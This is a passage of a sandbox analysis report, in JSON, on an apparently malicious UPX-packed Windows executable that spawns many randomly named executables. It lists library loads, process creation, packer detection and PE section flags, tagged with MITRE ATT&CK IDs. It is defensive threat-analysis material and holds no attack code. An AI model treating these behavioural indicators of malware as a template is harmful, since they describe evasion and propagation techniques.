(UID: 00000000-00006020)\n \"482606.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006020)\n \"482606.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006020)\n \"drrxb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004128)\n \"drrxb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004128)\n \"drrxb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004128)\n \"drrxb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004128)\n \"ldlfr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006008)\n \"ldlfr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006008)\n \"ldlfr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006008)\n \"ldlfr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006008)\n \"rfhxbp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005868)\n \"rfhxbp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005868)\n \"rfhxbp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005868)\n \"rfhxbp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005868)\n \"fhftdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000832)\n \"fhftdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000832)\n \"fhftdj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000832)\n \"fhftdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000832)\n \"442602.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003776)\n \"442602.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003776)\n \"442602.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003776)\n \"442602.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003776)\n \"8460680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002496)\n \"8460680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002496)\n \"8460680.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002496)\n \"8460680.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002496)\n \"nblht.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003784)\n \"nblht.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003784)\n \"nblht.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003784)\n \"nblht.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003784)\n \"vfpfhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003996)\n \"vfpfhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003996)\n \"vfpfhn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003996)\n \"vfpfhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003996)\n \"hbdtpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000780)\n \"hbdtpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000780)\n \"hbdtpx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000780)\n \"hbdtpx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000780)\n \"44244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004148)\n \"44244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004148)\n \"44244.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004148)\n \"44244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004148)\n \"60448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003384)\n \"60448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003384)\n \"60448.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003384)\n \"60448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003384)\n \"dtvthvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003512)\n \"dtvthvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003512)\n \"dtvthvj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003512)\n \"dtvthvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003512)\n \"tlxfnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002204)\n \"tlxfnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002204)\n \"tlxfnh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002204)\n \"tlxfnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002204)\n \"fnpdnrn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004036)\n \"fnpdnrn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004036)\n \"fnpdnrn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004036)\n \"fnpdnrn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004036)\n \"840882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004344)\n \"840882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004344)\n \"840882.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004344)\n \"840882.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004344)\n \"8082460.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004260)\n \"8082460.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004260)\n \"8082460.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004260)\n \"8082460.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004260)\n \"042028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004472)\n \"042028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004472)\n \"042028.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004472)\n \"042028.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004472)\n \"084242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003372)\n \"084242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003372)\n \"084242.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003372)\n \"084242.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003372)\n \"lxrvjtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000700)\n \"lxrvjtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000700)\n \"lxrvjtr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000700)\n \"lxrvjtr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000700)\n \"dpbtn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003912)\n \"dpbtn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003912)\n \"dpbtn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003912)\n \"dpbtn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003912)\n \"dvrdv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000984)\n \"dvrdv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000984)\n \"dvrdv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000984)\n \"dvrdv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000984)\n \"flxrvf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000888)\n \"flxrvf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000888)\n \"flxrvf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000888)\n \"flxrvf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000888)\n \"464224.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004040)\n \"464224.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004040)\n \"464224.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004040)\n \"464224.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004040)\n \"28646.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003796)\n \"28646.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003796)\n \"28646.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003796)\n \"28646.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003796)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"ptnfvbx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ptnfvbx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vplpt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vplpt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xdpjtxl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xdpjtxl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nxpbdf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nxpbdf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"800866.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"800866.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"482606.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"482606.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"drrxb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"drrxb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ldlfr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ldlfr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rfhxbp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rfhxbp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fhftdj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fhftdj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"442602.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"442602.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8460680.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8460680.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nblht.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nblht.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vfpfhn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vfpfhn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hbdtpx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hbdtpx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"44244.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"44244.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"60448.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"60448.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dtvthvj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dtvthvj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tlxfnh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tlxfnh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fnpdnrn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fnpdnrn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"840882.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"840882.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8082460.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8082460.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"042028.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"042028.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"084242.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"084242.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lxrvjtr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lxrvjtr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dpbtn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dpbtn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dvrdv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dvrdv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"flxrvf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"flxrvf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"464224.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"464224.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"28646.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"28646.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"ptnfvbx.exe\" (UID: 00000000-00005896)\n Spawned process \"lbxbhh.exe\" (UID: 00000000-00005792)\n Spawned process \"vplpt.exe\" (UID: 00000000-00005840)\n Spawned process \"xdpjtxl.exe\" (UID: 00000000-00006048)\n Spawned process \"nxpbdf.exe\" (UID: 00000000-00006000)\n Spawned process \"8080888.exe\" (UID: 00000000-00005784)\n Spawned process \"800866.exe\" (UID: 00000000-00006132)\n Spawned process \"4400860.exe\" (UID: 00000000-00005968)\n Spawned process \"8442880.exe\" (UID: 00000000-00004104)\n Spawned process \"482606.exe\" (UID: 00000000-00006020)\n Spawned process \"drrxb.exe\" (UID: 00000000-00004128)\n Spawned process \"ldlfr.exe\" (UID: 00000000-00006008)\n Spawned process \"00226.exe\" (UID: 00000000-00004284)\n Spawned process \"28886.exe\" (UID: 00000000-00004244)\n Spawned process \"4042240.exe\" (UID: 00000000-00004352)\n Spawned process \"42068.exe\" (UID: 00000000-00003580)\n Spawned process \"6028624.exe\" (UID: 00000000-00005252)\n Spawned process \"rbtft.exe\" (UID: 00000000-00004372)\n Spawned process \"rfhxbp.exe\" (UID: 00000000-00005868)\n Spawned process \"fhftdj.exe\" (UID: 00000000-00000832)\n Spawned process \"2886400.exe\" (UID: 00000000-00002728)\n Spawned process \"442602.exe\" (UID: 00000000-00003776)\n Spawned process \"8460680.exe\" (UID: 00000000-00002496)\n Spawned process \"xbbfdpr.exe\" (UID: 00000000-00003208)\n Spawned process \"nblht.exe\" (UID: 00000000-00003784)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" called \"CreateProcessA\" with parameter \"c:\\ptnfvbx.exe\" - (UID: 00000000-00005816)\n \"482606.exe\" called \"CreateProcessA\" with parameter \"c:\\drrxb.exe\" - (UID: 00000000-00006020)\n \"8082460.exe\" called \"CreateProcessA\" with parameter \"c:\\8844842.exe\" - (UID: 00000000-00004260)\n \"084242.exe\" called \"CreateProcessA\" with parameter \"c:\\2028620.exe\" - (UID: 00000000-00003372)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"ptnfvbx.exe\" (UID: 00000000-00005896)\n Spawned process \"lbxbhh.exe\" (UID: 00000000-00005792)\n Spawned process \"vplpt.exe\" (UID: 00000000-00005840)\n Spawned process \"xdpjtxl.exe\" (UID: 00000000-00006048)\n Spawned process \"nxpbdf.exe\" (UID: 00000000-00006000)\n Spawned process \"8080888.exe\" (UID: 00000000-00005784)\n Spawned process \"800866.exe\" (UID: 00000000-00006132)\n Spawned process \"4400860.exe\" (UID: 00000000-00005968)\n Spawned process \"8442880.exe\" (UID: 00000000-00004104)\n Spawned process \"482606.exe\" (UID: 00000000-00006020)\n Spawned process \"drrxb.exe\" (UID: 00000000-00004128)\n Spawned process \"ldlfr.exe\" (UID: 00000000-00006008)\n Spawned process \"00226.exe\" (UID: 00000000-00004284)\n Spawned process \"28886.exe\" (UID: 00000000-00004244)\n Spawned process \"4042240.exe\" (UID: 00000000-00004352)\n Spawned process \"42068.exe\" (UID: 00000000-00003580)\n Spawned process \"6028624.exe\" (UID: 00000000-00005252)\n Spawned process \"rbtft.exe\" (UID: 00000000-00004372)\n Spawned process \"rfhxbp.exe\" (UID: 00000000-00005868)\n Spawned process \"fhftdj.exe\" (UID: 00000000-00000832)\n Spawned process \"2886400.exe\" (UID: 00000000-00002728)\n Spawned process \"442602.exe\" (UID: 00000000-00003776)\n Spawned process \"8460680.exe\" (UID: 00000000-00002496)\n Spawned process \"xbbfdpr.exe\" (UID: 00000000-00003208)\n Spawned process \"nblht.exe\" (UID: 00000000-00003784)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" was detected as \"UPX\" and name: \"Packer\"\n \"64446.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fjpblh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"06268.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rlxfxx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rxvnflf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"80060.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"66686.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"624000.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"6206480.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rdnjbjh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2408206.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2204200.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"28042.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"028260.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tfdbnrd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rjrvvt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"blnxt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tnvhlh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ljhdxt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"82426.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"28646.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"228864.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"8402266.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"088422.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4c575@RPCRT4.dll\"\n \"15001600c03e5c6a@ADVAPI32.dll\"\n \"0e000f00703f5c6a@ADVAPI32.dll\"\n \"0e000f00cc3f5c6a@ADVAPI32.dll\"\n \"11001200b4475c6a@ADVAPI32.dll\"\n \"1100120048485c6a@ADVAPI32.dll\"\n \"120013008c485c6a@ADVAPI32.dll\"\n \"12001300e4485c6a@ADVAPI32.dll\"\n \"14001500386e5c6a@ADVAPI32.dll\"\n \"14001500506e5c6a@ADVAPI32.dll\"\n \"14001500686e5c6a@ADVAPI32.dll\"\n \"17001800806e5c6a@ADVAPI32.dll\"\n \"0d000e00986e5c6a@ADVAPI32.dll\"\n \"11001200a86e5c6a@ADVAPI32.dll\"\n \"11001200bc6e5c6a@ADVAPI32.dll\"\n \"0f001000fc6f5c6a@ADVAPI32.dll\"\n \"140015003c705c6a@ADVAPI32.dll\"\n \"1400150054705c6a@ADVAPI32.dll\"\n \"0c000d009c705c6a@ADVAPI32.dll\"\n \"0c000d00ac705c6a@ADVAPI32.dll\"\n \"0e000f00bc705c6a@ADVAPI32.dll\"\n \"0e000f00cc705c6a@ADVAPI32.dll\"\n \"0b000c00dc705c6a@ADVAPI32.dll\"\n \"1800190014735c6a@RPCRT4.dll\"\n \"1300140040735c6a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has an writable section named \"UPX0\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has an writable section named \"UPX1\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has an writable section named \"UPX2\"\n \"64446.exe\" has an writable section named \"UPX0\"\n \"64446.exe\" has an writable section named \"UPX1\"\n \"64446.exe\" has an writable section named \"UPX2\"\n \"fjpblh.exe\" has an writable section named \"UPX0\"\n \"fjpblh.exe\" has an writable section named \"UPX1\"\n \"fjpblh.exe\" has an writable section named \"UPX2\"\n \"06268.exe\" has an writable section named \"UPX0\"\n \"06268.exe\" has an writable section named \"UPX1\"\n \"06268.exe\" has an writable section named \"UPX2\"\n \"rlxfxx.exe\" has an writable section named \"UPX0\"\n \"rlxfxx.exe\" has an writable section named \"UPX1\"\n \"rlxfxx.exe\" has an writable section named \"UPX2\"\n \"rxvnflf.exe\" has an writable section named \"UPX0\"\n \"rxvnflf.exe\" has an writable section named \"UPX1\"\n \"rxvnflf.exe\" has an writable section named \"UPX2\"\n \"80060.exe\" has an writable section named \"UPX0\"\n \"80060.exe\" has an writable section named \"UPX1\"\n \"80060.exe\" has an writable section named \"UPX2\"\n \"66686.exe\" has an writable section named \"UPX0\"\n \"66686.exe\" has an writable section named \"UPX1\"\n \"66686.exe\" has an writable section named \"UPX2\"\n \"624000.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has an executable section named \"UPX0\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has an executable section named \"UPX1\"\n \"64446.exe\" has an executable section named \"UPX0\"\n \"64446.exe\" has an executable section named \"UPX1\"\n \"fjpblh.exe\" has an executable section named \"UPX0\"\n \"fjpblh.exe\" has an executable section named \"UPX1\"\n \"06268.exe\" has an executable section named \"UPX0\"\n \"06268.exe\" has an executable section named \"UPX1\"\n \"rlxfxx.exe\" has an executable section named \"UPX0\"\n \"rlxfxx.exe\" has an executable section named \"UPX1\"\n \"rxvnflf.exe\" has an executable section named \"UPX0\"\n \"rxvnflf.exe\" has an executable section named \"UPX1\"\n \"80060.exe\" has an executable section named \"UPX0\"\n \"80060.exe\" has an executable section named \"UPX1\"\n \"66686.exe\" has an executable section named \"UPX0\"\n \"66686.exe\" has an executable section named \"UPX1\"\n \"624000.exe\" has an executable section named \"UPX0\"\n \"624000.exe\" has an executable section named \"UPX1\"\n \"6206480.exe\" has an executable section named \"UPX0\"\n \"6206480.exe\" has an executable section named \"UPX1\"\n \"rdnjbjh.exe\" has an 